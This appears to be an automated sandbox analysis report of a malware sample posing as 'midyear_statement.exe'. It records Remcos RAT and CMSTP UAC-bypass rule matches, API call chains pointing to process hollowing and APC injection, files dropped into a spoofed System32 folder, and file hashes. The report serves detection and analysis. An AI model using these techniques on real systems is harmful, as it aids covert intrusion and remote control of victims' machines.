Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Abnormal high CPU Usage

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040BCD1C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_040BCD1C
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040BCE00 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_040BCE00
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B7EE8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_040B7EE8
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040BD850 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,Sleep,WinExec,WinExec,RtlMoveMemory,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess,	0_2_040BD850
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B78F8 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_040B78F8
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	0_2_040B7A50
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040BA160 GetModuleHandleW,GetProcAddress,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,CloseHandle,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,	0_2_040BA160
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040C62C4 CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess,	0_2_040C62C4
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040BD850 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,Sleep,WinExec,WinExec,RtlMoveMemory,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess,	0_2_040BD850
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040BCD1A RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_040BCD1A
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B7EE6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_040B7EE6
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040B78F6 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_040B78F6
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123480EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	24_2_123480EF
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123432D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,	24_2_123432D2
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1234BB35 OpenProcess,NtResumeProcess,CloseHandle,	24_2_1234BB35
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1234BB09 OpenProcess,NtSuspendProcess,CloseHandle,	24_2_1234BB09
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,	27_2_0040DD85
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00401806 NtdllDefWindowProc_W,	27_2_00401806
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_004018C0 NtdllDefWindowProc_W,	27_2_004018C0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_004016FD NtdllDefWindowProc_A,	28_2_004016FD
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_004017B7 NtdllDefWindowProc_A,	28_2_004017B7

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\midyear_statement.exe

0_2_040B7EE8

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_123467B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,

24_2_123467B4

Creates files inside the system directory

Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Windows \System32\2506803.exe	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Windows \System32\netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	File created: C:\Windows \System32\KDECO.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows \System32	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Users\user\Desktop\midyear_statement.exe

File deleted: C:\Windows \System32\netutils.dll

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A20C4	0_2_040A20C4
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_004057B8	24_2_004057B8
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005CF0DD	24_2_005CF0DD
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005B817F	24_2_005B817F
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005E410D	24_2_005E410D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005C82C8	24_2_005C82C8
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005CF33A	24_2_005CF33A
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005C9552	24_2_005C9552
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005C86E0	24_2_005C86E0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005C4728	24_2_005C4728
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005DE7AB	24_2_005DE7AB
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005B8828	24_2_005B8828
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005AE944	24_2_005AE944
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005B8991	24_2_005B8991
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005C8B15	24_2_005C8B15
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005B7BF0	24_2_005B7BF0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005C6C40	24_2_005C6C40
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005CEC7F	24_2_005CEC7F
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005C7DCC	24_2_005C7DCC
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005A4DAC	24_2_005A4DAC
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005AFEDC	24_2_005AFEDC
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005CEEAE	24_2_005CEEAE
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005C8F4A	24_2_005C8F4A
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005E4F3B	24_2_005E4F3B
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005D6FD2	24_2_005D6FD2
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1236E2FB	24_2_1236E2FB
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1238332B	24_2_1238332B
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1235739D	24_2_1235739D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1234F0FA	24_2_1234F0FA
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123470C2	24_2_123470C2
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1236E0CC	24_2_1236E0CC
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12347121	24_2_12347121
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12347104	24_2_12347104
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12368168	24_2_12368168
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12384159	24_2_12384159
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123761F0	24_2_123761F0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123686E8	24_2_123686E8
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12368770	24_2_12368770
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123674E6	24_2_123674E6
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1236E558	24_2_1236E558
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12357A46	24_2_12357A46
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1234DB62	24_2_1234DB62
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12357BAF	24_2_12357BAF
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123678FE	24_2_123678FE
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12363946	24_2_12363946
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1237D9C9	24_2_1237D9C9
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12356E0E	24_2_12356E0E
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12365E5E	24_2_12365E5E
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1236DE9D	24_2_1236DE9D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12366FEA	24_2_12366FEA
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12343FCA	24_2_12343FCA
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12367D33	24_2_12367D33
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1464B5C1	24_2_1464B5C1
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_14657194	24_2_14657194
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0044B040	27_2_0044B040
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0043610D	27_2_0043610D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00447310	27_2_00447310
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0044A490	27_2_0044A490
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0040755A	27_2_0040755A
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0043C560	27_2_0043C560
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0044B610	27_2_0044B610
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0044D6C0	27_2_0044D6C0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_004476F0	27_2_004476F0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0044B870	27_2_0044B870
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0044081D	27_2_0044081D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00414957	27_2_00414957
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_004079EE	27_2_004079EE
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00407AEB	27_2_00407AEB
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0044AA80	27_2_0044AA80
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00412AA9	27_2_00412AA9
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00404B74	27_2_00404B74
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00404B03	27_2_00404B03
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0044BBD8	27_2_0044BBD8
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00404BE5	27_2_00404BE5
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00404C76	27_2_00404C76
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00415CFE	27_2_00415CFE
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00416D72	27_2_00416D72
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00446D30	27_2_00446D30
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00446D8B	27_2_00446D8B
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00406E8F	27_2_00406E8F
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00405038	28_2_00405038
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_0041208C	28_2_0041208C
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_004050A9	28_2_004050A9
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_0040511A	28_2_0040511A
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_0043C13A	28_2_0043C13A
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_004051AB	28_2_004051AB
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00449300	28_2_00449300
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_0040D322	28_2_0040D322
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_0044A4F0	28_2_0044A4F0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_0043A5AB	28_2_0043A5AB
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00413631	28_2_00413631
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00446690	28_2_00446690
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_0044A730	28_2_0044A730
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_004398D8	28_2_004398D8
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_004498E0	28_2_004498E0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_0044A886	28_2_0044A886
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_0043DA09	28_2_0043DA09
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00438D5E	28_2_00438D5E
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00449ED0	28_2_00449ED0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_0041FE83	28_2_0041FE83
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00430F54	28_2_00430F54

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\wkrriuhD.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: Joe Sandbox View	Dropped File: C:\Windows \System32\2506803.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: String function: 040A47D0 appears 931 times
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: String function: 040A4470 appears 67 times
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: String function: 040A4668 appears 250 times
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: String function: 040B7B88 appears 45 times
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: String function: 040A660C appears 33 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 004169A7 appears 87 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 004165FF appears 35 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 005C5552 appears 41 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 00422297 appears 42 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 12364E10 appears 54 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 00592C47 appears 34 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 0040A6C4 appears 68 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 12332093 appears 50 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 005C5BF2 appears 54 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 00444B5A appears 37 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 12331E65 appears 35 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 00413025 appears 79 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 12364770 appears 41 times
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: String function: 00416760 appears 69 times

PE file contains more sections than normal

Source: netutils.dll.0.dr

Static PE information: Number of sections : 19 > 10

Sample file is different than original file name gathered from version info

Source: midyear_statement.exe	Binary or memory string: OriginalFilename vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
Source: midyear_statement.exe, 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs midyear_statement.exe
